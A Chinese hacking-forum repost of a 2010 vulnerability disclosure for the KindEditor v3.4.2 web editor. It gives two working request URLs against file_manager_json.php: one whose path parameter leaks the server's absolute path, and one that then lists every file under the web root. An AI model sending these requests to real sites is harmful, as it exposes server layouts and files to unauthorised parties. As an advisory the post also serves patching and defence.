- 帖子
- 253
- 积分
- 742
- 威望
- 1111
- 金钱
- 841
- 在线时间
- 30 小时
|
发布日期:2010-05.31
发布作者:子↘仪
影响版本:Kindeditor v3.4.2
官方地址:http://www.kindsoft.net/
漏洞描述: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,KindEditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
本文转自 ☆★ 黑白前线 ★☆ - www.hackline.net 转载请注明出处,侵权必究!
原文链接:http://www.hackline.net/a/news/ldfb/web/2010/0531/4154.html |
|